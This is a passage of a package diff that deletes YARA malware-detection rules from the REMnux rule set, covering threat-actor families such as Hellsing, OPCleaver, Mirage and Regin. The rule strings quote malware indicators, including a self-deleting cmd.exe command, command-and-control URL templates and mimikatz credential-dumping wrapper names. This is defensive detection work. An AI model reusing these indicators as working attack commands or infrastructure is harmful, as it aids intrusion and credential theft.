-		$debugpath7="d:\\hellsing\\sys\\irene\\" nocase
-
-		$e="msger_server.dll"
-		$f="ServiceMain"
-
-	condition:
-		($mz at 0) and (all of ($a*)) or (all of ($b*)) or ($c and $d) or (any of ($debugpath*)) or ($e and $f) and filesize < 500000
-}
-
-rule apt_hellsing_installer : PE
-{
-	meta:
-		Author		= "Costin Raiu, Kaspersky Lab"
-		Date		= "2015-04-07"
-		Description	= "detection for Hellsing xweber/msger installers"
-		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" 
-
-	strings: 
-		$mz="MZ"
-		
-		$cmd="cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\""
-		
-		$a1="xweber_install_uac.exe"
-		$a2="system32\\cmd.exe" wide
-		$a4="S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y=" 
-		$a5="S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg=" $a6="7dqm2ODf5N/Y2N/m6+br3dnZpunl44g="
-		$a7="vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw==" 
-		$a8="vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSI Njl2tyI" $a9="C:\\Windows\\System32\\sysprep\\sysprep.exe" wide 
-		$a10="%SystemRoot%\\system32\\cmd.exe" wide 
-		$a11="msger_install.dll"
-		$a12={00 65 78 2E 64 6C 6C 00}
-
-	condition:
-		($mz at 0) and ($cmd and (2 of ($a*))) and filesize < 500000
-}
-
-rule apt_hellsing_proxytool : PE
-{
-	meta:
-		Author		= "Costin Raiu, Kaspersky Lab"
-		Date		= "2015-04-07"
-		Description	= "detection for Hellsing proxy testing tool"
-		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" 
-
-	strings: 
-		$mz="MZ"
-		$a1="PROXY_INFO: automatic proxy url => %s " 
-		$a2="PROXY_INFO: connection type => %d " 
-		$a3="PROXY_INFO: proxy server => %s " 
-		$a4="PROXY_INFO: bypass list => %s " 
-		$a5="InternetQueryOption failed with GetLastError() %d" 
-		$a6="D:\\Hellsing\\release\\exe\\exe\\" nocase
-
-	condition:
-		($mz at 0) and (2 of ($a*)) and filesize < 300000
-}
-
-rule apt_hellsing_xkat : PE
-{
-	meta:
-		Author		= "Costin Raiu, Kaspersky Lab"
-		Date		= "2015-04-07"
-		Description	= "detection for Hellsing xKat tool"
-		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
-
-	strings:
-		$mz="MZ"
-		$a1="\\Dbgv.sys"
-		$a2="XKAT_BIN"
-		$a3="release sys file error."
-		$a4="driver_load error. "
-		$a5="driver_create error."
-		$a6="delete file:%s error."
-		$a7="delete file:%s ok."
-		$a8="kill pid:%d error."
-		$a9="kill pid:%d ok."
-		$a10="-pid-delete"
-		$a11="kill and delete pid:%d error."
-		$a12="kill and delete pid:%d ok."
-
-	condition:
-		($mz at 0) and (6 of ($a*)) and filesize < 300000
-}
-
-rule apt_hellsing_msgertype2 : PE
-{
-	meta:
-		Author		= "Costin Raiu, Kaspersky Lab"
-		Date		= "2015-04-07"
-		Description	= "detection for Hellsing msger type 2 implants"
-		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
-
-	strings:
-		$mz="MZ"
-		$a1="%s\\system\\%d.txt"
-		$a2="_msger"
-		$a3="http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s"
-		$a4="http://%s/data/%s.1000001000"
-		$a5="/lib/common.asp?action=user_upload&file="
-		$a6="%02X-%02X-%02X-%02X-%02X-%02X"
-	
-	condition:
-		($mz at 0) and (4 of ($a*)) and filesize < 500000
-}
-
-rule apt_hellsing_irene : PE
-{
-	meta:
-		Author		= "Costin Raiu, Kaspersky Lab"
-		Date		= "2015-04-07"
-		Description	= "detection for Hellsing msger irene installer"
-		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
-
-	strings: 
-		$mz="MZ"
-		$a1="\\Drivers\\usbmgr.tmp" wide
-		$a2="\\Drivers\\usbmgr.sys" wide
-		$a3="common_loadDriver CreateFile error! " 
-		$a4="common_loadDriver StartService error && GetLastError():%d! " 
-		$a5="irene" wide
-		$a6="aPLib v0.43 - the smaller the better" 
-
-	condition:
-		($mz at 0) and (4 of ($a*)) and filesize < 500000
-}
diff -Nru remnux-rules-0.0.3/yara/APT_Hikit.yara remnux-rules-0.0.4/yara/APT_Hikit.yara
--- remnux-rules-0.0.3/yara/APT_Hikit.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_Hikit.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,16 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule APT_Hikit_msrv
-{
-meta:
-	author = "ThreatConnect Intelligence Research Team"
-strings:
-	$m = {6D 73 72 76 2E 64 6C 6C 00 44 6C 6C}
-condition:
-	any of them
-}
diff -Nru remnux-rules-0.0.3/yara/APT_Kaba.yara remnux-rules-0.0.4/yara/APT_Kaba.yara
--- remnux-rules-0.0.3/yara/APT_Kaba.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_Kaba.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,26 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule rtf_Kaba_jDoe
-{
-meta:
-	author = "@patrickrolsen"
-	maltype = "APT.Kaba"
-	filetype = "RTF"
-	version = "0.1"
-	description = "fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620"
-	date = "2013-12-10"
-strings:
-  	$magic1 = { 7b 5c 72 74 30 31 } // {\rt01
-  	$magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
-  	$magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
-  	$author1 = { 4A 6F 68 6E 20 44 6F 65 } // "John Doe"
-  	$author2 = { 61 75 74 68 6f 72 20 53 74 6f 6e 65 } // "author Stone"
-	$string1 = { 44 30 [16] 43 46 [23] 31 31 45 }
-condition:
-  	($magic1 or $magic2 or $magic3 at 0) and all of ($author*) and $string1
-} 
diff -Nru remnux-rules-0.0.3/yara/APT_Mirage.yara remnux-rules-0.0.4/yara/APT_Mirage.yara
--- remnux-rules-0.0.3/yara/APT_Mirage.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_Mirage.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,50 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule MirageStrings : Mirage Family
-{
-    meta:
-        description = "Mirage Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    strings:
-        $ = "Neo,welcome to the desert of real." wide ascii
-        $ = "/result?hl=en&id=%s"
-        
-    condition:
-       any of them
-}
-
-rule Mirage : Family
-{
-    meta:
-        description = "Mirage"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    condition:
-        MirageStrings
-}
-
-rule Mirage_APT : APT Backdoor Rat
-{
-    meta:
-        Author      = "Silas Cutler"
-        Date        = "yyyy/mm/dd"
-        Description = "Malware related to APT campaign"
-        Reference   = "Useful link"
-    
-    strings:
-        $a1 = "welcome to the desert of the real"
-        $a2 = "Mirage"
-        $b = "Encoding: gzip"
-        $c = /\/[A-Za-z]*\?hl=en/
-
-    condition: 
-        (($a1 or $a2) or $b) and $c
-}
diff -Nru remnux-rules-0.0.3/yara/APT_Mongall.yara remnux-rules-0.0.4/yara/APT_Mongall.yara
--- remnux-rules-0.0.3/yara/APT_Mongall.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_Mongall.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,68 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Backdoor_APT_Mongal
-{
-meta:
-	author = "@patrickrolsen"
-	maltype = "Backdoor.APT.Mongall"
-	version = "0.1"
-	reference = "fd69a799e21ccb308531ce6056944842" 
-	date = "01/04/2014"
-strings:
-	$author  = "author user"
-	$title   = "title Vjkygdjdtyuj" nocase
-	$comp    = "company ooo"
-	$cretime = "creatim\\yr2012\\mo4\\dy19\\hr15\\min10"
-	$passwd  = "password 00000000"
-condition:
-        all of them
-}
-
-rule MongalCode : Mongal Family 
-{
-    meta:
-        description = "Mongal code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-15"
-    
-    strings:
-        // gettickcount value checking
-        $ = { 8B C8 B8 D3 4D 62 10 F7 E1 C1 EA 06 2B D6 83 FA 05 76 EB }
-        
-    condition:
-        any of them
-}
-
-rule MongalStrings : Mongal Family
-{
-    meta:
-        description = "Mongal Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-07-15"
-        
-    strings:
-        $ = "NSCortr.dll"
-        $ = "NSCortr1.dll"
-        $ = "Sina.exe"
-        
-    condition:
-        any of them
-}
-
-rule Mongal : Family
-{
-    meta:
-        description = "Mongal"
-        author = "Seth Hardy"
-        last_modified = "2014-07-15"
-        
-    condition:
-        MongalCode or MongalStrings
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/APT_NGO_wuaclt.yara remnux-rules-0.0.4/yara/APT_NGO_wuaclt.yara
--- remnux-rules-0.0.3/yara/APT_NGO_wuaclt.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_NGO_wuaclt.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,39 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule APT_NGO_wuaclt
-{
-   meta:
-    author = "AlienVault Labs"
-  strings:
-    $a = "%%APPDATA%%\\Microsoft\\wuauclt\\wuauclt.dat"
-    $b = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
-    $c = "/news/show.asp?id%d=%d"
-    
-	$d = "%%APPDATA%%\\Microsoft\\wuauclt\\"
-	$e = "0l23kj@nboxu"
-	
-	$f = "%%s.asp?id=%%d&Sid=%%d"
-	$g = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SP Q%%d)"
-	$h = "Cookies: UseID=KGIOODAOOK%%s"
-
-  condition:
-    ($a and $b and $c) or ($d and $e) or ($f and $g and $h)
-}
-
-rule APT_NGO_wuaclt_PDF
-{
-    	meta:
-        	author = "AlienVault Labs"
-
-	strings:
-		$pdf  = "%PDF" nocase
-		$comment = {3C 21 2D 2D 0D 0A 63 57 4B 51 6D 5A 6C 61 56 56 56 56 56 56 56 56 56 56 56 56 56 63 77 53 64 63 6A 4B 7A 38 35 6D 37 4A 56 6D 37 4A 46 78 6B 5A 6D 5A 6D 52 44 63 5A 58 41 73 6D 5A 6D 5A 7A 42 4A 31 79 73 2F 4F 0D 0A}
-	
-	condition:
-		$pdf at 0 and $comment in (0..200)
-}
diff -Nru remnux-rules-0.0.3/yara/APT_OPCleaver.yara remnux-rules-0.0.4/yara/APT_OPCleaver.yara
--- remnux-rules-0.0.3/yara/APT_OPCleaver.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_OPCleaver.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,279 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule ZhoupinExploitCrew
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-  	$s1 = "zhoupin exploit crew" nocase
-    $s2 = "zhopin exploit crew" nocase
-  condition:
-  	1 of them
-}
-
-rule BackDoorLogger
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "BackDoorLogger"
-    $s2 = "zhuAddress"
-  condition:
-    all of them
-}
-
-rule Jasus
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "pcap_dump_open"
-    $s2 = "Resolving IPs to poison..."
-    $s3 = "WARNNING: Gateway IP can not be found"
-  condition:
-    all of them
-}
-
-rule LoggerModule
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "%s-%02d%02d%02d%02d%02d.r"
-    $s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
-  condition:
-    all of them
-}
-
-rule NetC
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "NetC.exe" wide
-    $s2 = "Net Service"
-  condition:
-    all of them
-}
-
-rule ShellCreator2
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "ShellCreator2.Properties"
-    $s2 = "set_IV"
-  condition:
-    all of them
-}
-
-rule SmartCopy2
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "SmartCopy2.Properties"
-    $s2 = "ZhuFrameWork"
-  condition:
-    all of them
-}
-
-rule SynFlooder
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "Unable to resolve [ %s ]. ErrorCode %d"
-    $s2 = "your target's IP is : %s"
-    $s3 = "Raw TCP Socket Created successfully."
-  condition:
-    all of them
-}
-
-rule TinyZBot
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "NetScp" wide
-    $s2 = "TinyZBot.Properties.Resources.resources"
-
-    $s3 = "Aoao WaterMark"
-    $s4 = "Run_a_exe"
-    $s5 = "netscp.exe"
-
-    $s6 = "get_MainModule_WebReference_DefaultWS"
-    $s7 = "remove_CheckFileMD5Completed"
-    $s8 = "http://tempuri.org/"
-
-    $s9 = "Zhoupin_Cleaver"
-  condition:
-    ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or ($s9)
-}
-
-rule antivirusdetector
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-	strings:
-		$s1 = "getShadyProcess"
-		$s2 = "getSystemAntiviruses"
-		$s3 = "AntiVirusDetector"
-	condition:
-		all of them
-}
-
-rule csext
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "COM+ System Extentions"
-    $s2 = "csext.exe"
-    $s3 = "COM_Extentions_bin"
-  condition:
-    all of them
-}
-
-rule kagent
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "kill command is in last machine, going back"
-    $s2 = "message data length in B64: %d Bytes"
-  condition:
-    all of them
-}
-
-rule mimikatzWrapper
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "mimikatzWrapper"
-    $s2 = "get_mimikatz"
-  condition:
-    all of them
-}
-
-rule pvz_in
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "LAST_TIME=00/00/0000:00:00PM$"
-    $s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
-  condition:
-    all of them
-}
-
-rule pvz_out
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "Network Connectivity Module" wide
-    $s2 = "OSPPSVC" wide
-  condition:
-    all of them
-}
-
-rule wndTest
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "[Alt]" wide
-    $s2 = "<< %s >>:" wide
-    $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
-  condition:
-    all of them
-}
-
-rule zhCat
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "zhCat -l -h -tp 1234"
-    $s2 = "ABC ( A Big Company )" wide
-  condition:
-    all of them
-}
-
-rule zhLookUp
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "zhLookUp.Properties"
-  condition:
-    all of them
-}
-
-rule zhmimikatz
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-    $s1 = "MimikatzRunner"
-    $s2 = "zhmimikatz"
-  condition:
-    all of them
-}
-
-rule Zh0uSh311
-{
-  meta:
-    author = "Cylance"
-    date = "2014-12-02"
-    description = "http://cylance.com/opcleaver"
-  strings:
-  	$s1 = "Zh0uSh311"
-  condition:
-  	all of them
-}
diff -Nru remnux-rules-0.0.3/yara/APT_pcclient.yara remnux-rules-0.0.4/yara/APT_pcclient.yara
--- remnux-rules-0.0.3/yara/APT_pcclient.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_pcclient.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,27 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule backdoor_apt_pcclient
-{
-meta:
-	author = "@patrickrolsen"
-	maltype = "APT.PCCLient"
-	filetype = "DLL"
-	version = "0.1"
-	description = "Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF)"
-	date = "2012-10"
-strings:
-	$magic = { 4d 5a } // MZ
-	$string1 = "www.micro1.zyns.com"
-	$string2 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
-	$string3 = "msacm32.drv" wide
-	$string4 = "C:\\Windows\\Explorer.exe" wide
-	$string5 = "Elevation:Administrator!" wide
-	$string6 = "C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdb"
-condition:
-	$magic at 0 and 4 of ($string*)
-}
diff -Nru remnux-rules-0.0.3/yara/APT_Regin.yara remnux-rules-0.0.4/yara/APT_Regin.yara
--- remnux-rules-0.0.3/yara/APT_Regin.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_Regin.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,407 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-rule Regin_APT_KernelDriver_Generic_A {
-	meta:
-		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
-		author = "@Malwrsignatures - included in APT Scanner THOR"
-		date = "23.11.14"
-		hash1 = "187044596bc1328efa0ed636d8aa4a5c"
-		hash2 = "06665b96e293b23acc80451abb413e50"
-		hash3 = "d240f06e98c8d3e647cbf4d442d79475"
-	strings:
-		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
-		$m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
-		
-		$s0 = "atapi.sys" fullword wide
-		$s1 = "disk.sys" fullword wide
-		$s3 = "h.data" fullword ascii
-		$s4 = "\\system32" fullword ascii
-		$s5 = "\\SystemRoot" fullword ascii
-		$s6 = "system" fullword ascii
-		$s7 = "temp" fullword ascii
-		$s8 = "windows" fullword ascii
-
-		$x1 = "LRich6" fullword ascii
-		$x2 = "KeServiceDescriptorTable" fullword ascii		
-	condition:
-		$m0 at 0 and $m1 and  	
-		all of ($s*) and 1 of ($x*)
-}
-
-rule Regin_APT_KernelDriver_Generic_B {
-	meta:
-		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
-		author = "@Malwrsignatures - included in APT Scanner THOR"
-		date = "23.11.14"
-		hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
-		hash2 = "bfbe8c3ee78750c3a520480700e440f8"
-		hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
-		hash4 = "06665b96e293b23acc80451abb413e50"
-		hash5 = "2c8b9d2885543d7ade3cae98225e263b"
-		hash6 = "4b6b86c7fec1c574706cecedf44abded"
-		hash7 = "187044596bc1328efa0ed636d8aa4a5c"
-		hash8 = "d240f06e98c8d3e647cbf4d442d79475"
-		hash9 = "6662c390b2bbbd291ec7987388fc75d7"
-		hash10 = "1c024e599ac055312a4ab75b3950040a"
-		hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
-		hash12 = "b505d65721bb2453d5039a389113b566"
-		hash13 = "b269894f434657db2b15949641a67532"
-	strings:
-		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
-		$s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
-		$s2 = "H.data" fullword ascii nocase
-		$s3 = "INIT" fullword ascii
-		$s4 = "ntoskrnl.exe" fullword ascii
-		
-		$v1 = "\\system32" fullword ascii
-		$v2 = "\\SystemRoot" fullword ascii
-		$v3 = "KeServiceDescriptorTable" fullword ascii	
-		
-		$w1 = "\\system32" fullword ascii
-		$w2 = "\\SystemRoot" fullword ascii		
-		$w3 = "LRich6" fullword ascii
-		
-		$x1 = "_snprintf" fullword ascii
-		$x2 = "_except_handler3" fullword ascii
-		
-		$y1 = "mbstowcs" fullword ascii
-		$y2 = "wcstombs" fullword ascii
-		$y3 = "KeGetCurrentIrql" fullword ascii
-		
-		$z1 = "wcscpy" fullword ascii
-		$z2 = "ZwCreateFile" fullword ascii
-		$z3 = "ZwQueryInformationFile" fullword ascii
-		$z4 = "wcslen" fullword ascii
-		$z5 = "atoi" fullword ascii
-	condition:
-		$m0 at 0 and all of ($s*) and 
-		( all of ($v*) or all of ($w*) or all of ($x*) or all of ($y*) or all of ($z*) ) 
-		and filesize < 20KB
-}
-
-rule Regin_APT_KernelDriver_Generic_C {
-	meta:
-		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
-		author = "@Malwrsignatures - included in APT Scanner THOR"
-		date = "23.11.14"
-		hash1 = "e0895336617e0b45b312383814ec6783556d7635"
-		hash2 = "732298fa025ed48179a3a2555b45be96f7079712"		
-	strings:
-		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
-	
-		$s0 = "KeGetCurrentIrql" fullword ascii
-		$s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide
-		$s2 = "usbclass" fullword wide
-		
-		$x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
-		$x2 = "Universal Serial Bus Class Driver" fullword wide
-		$x3 = "5.2.3790.0" fullword wide
-		
-		$y1 = "LSA Shell" fullword wide
-		$y2 = "0Richw" fullword ascii		
-	condition:
-		$m0 at 0 and all of ($s*) and 
-		( all of ($x*) or all of ($y*) ) 
-		and filesize < 20KB
-}
-
-/* Update 27.11.14 */
-
-rule Regin_sig_svcsstat {
-	meta:
-		description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
-		author = "@MalwrSignatures"
-		date = "26.11.14"
-		hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"
-	strings:
-		$s0 = "Service Control Manager" fullword ascii
-		$s1 = "_vsnwprintf" fullword ascii
-		$s2 = "Root Agency" fullword ascii
-		$s3 = "Root Agency0" fullword ascii
-		$s4 = "StartServiceCtrlDispatcherA" fullword ascii
-		$s5 = "\\\\?\\UNC" fullword wide
-		$s6 = "%ls%ls" fullword wide
-	condition:
-		all of them and filesize < 15KB and filesize > 10KB 
-}
-
-rule Regin_Sample_1 {
-	meta:
-		description = "Auto-generated rule - file-3665415_sys"
-		author = "@MalwrSignatures"
-		date = "26.11.14"
-		hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"
-	strings:
-		$s0 = "Getting PortName/Identifier failed - %x" fullword ascii
-		$s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii
-		$s2 = "External Naming Failed - Status %x" fullword ascii
-		$s3 = "------- Same multiport - different interrupts" fullword ascii
-		$s4 = "%x occurred prior to the wait - starting the" fullword ascii
-		$s5 = "'user registry info - userPortIndex: %d" fullword ascii
-		$s6 = "Could not report legacy device - %x" fullword ascii
-		$s7 = "entering SerialGetPortInfo" fullword ascii
-		$s8 = "'user registry info - userPort: %x" fullword ascii
-		$s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii
-		$s10 = "Kernel debugger is using port at address %X" fullword ascii
-		$s12 = "Release - freeing multi context" fullword ascii
-		$s13 = "Serial driver will not load port" fullword ascii
-		$s14 = "'user registry info - userAddressSpace: %d" fullword ascii
-		$s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii
-		$s20 = "'user registry info - userIndexed: %d" fullword ascii
-	condition:
-		all of them and filesize < 110KB and filesize > 80KB
-}
-
-rule Regin_Sample_2 {
-	meta:
-		description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
-		author = "@MalwrSignatures"
-		date = "26.11.14"
-		hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"
-	strings:
-		$s0 = "\\SYSTEMROOT\\system32\\lsass.exe" fullword wide
-		$s1 = "atapi.sys" fullword wide
-		$s2 = "disk.sys" fullword wide
-		$s3 = "IoGetRelatedDeviceObject" fullword ascii
-		$s4 = "HAL.dll" fullword ascii
-		$s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" fullword ascii
-		$s6 = "PsGetCurrentProcessId" fullword ascii
-		$s7 = "KeGetCurrentIrql" fullword ascii
-		$s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
-		$s9 = "KeSetImportanceDpc" fullword ascii
-		$s10 = "KeQueryPerformanceCounter" fullword ascii
-		$s14 = "KeInitializeEvent" fullword ascii
-		$s15 = "KeDelayExecutionThread" fullword ascii
-		$s16 = "KeInitializeTimerEx" fullword ascii
-		$s18 = "PsLookupProcessByProcessId" fullword ascii
-		$s19 = "ExReleaseFastMutexUnsafe" fullword ascii
-		$s20 = "ExAcquireFastMutexUnsafe" fullword ascii
-	condition:
-		all of them and filesize < 40KB and filesize > 30KB
-}
-
-rule Regin_Sample_3 {
-	meta:
-		description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
-		author = "@Malwrsignatures"
-		date = "27.11.14"
-		hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"		
-	strings:
-		$hd = { fe ba dc fe }
-	
-		$s0 = "Service Pack x" fullword wide
-		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
-		$s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
-		$s3 = "mntoskrnl.exe" fullword wide
-		$s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" fullword wide
-		$s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
-		$s6 = "Service Pack" fullword wide
-		$s7 = ".sys" fullword wide
-		$s8 = ".dll" fullword wide		
-		
-		$s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" fullword wide
-		$s11 = "IoGetRelatedDeviceObject" fullword ascii
-		$s12 = "VMEM.sys" fullword ascii
-		$s13 = "RtlGetVersion" fullword wide
-		$s14 = "ntkrnlpa.exe" fullword ascii
-	condition:
-		( $hd at 0 ) and all of ($s*) and filesize > 160KB and filesize < 200KB
-}
-
-rule Regin_Sample_Set_1 {
-	meta:
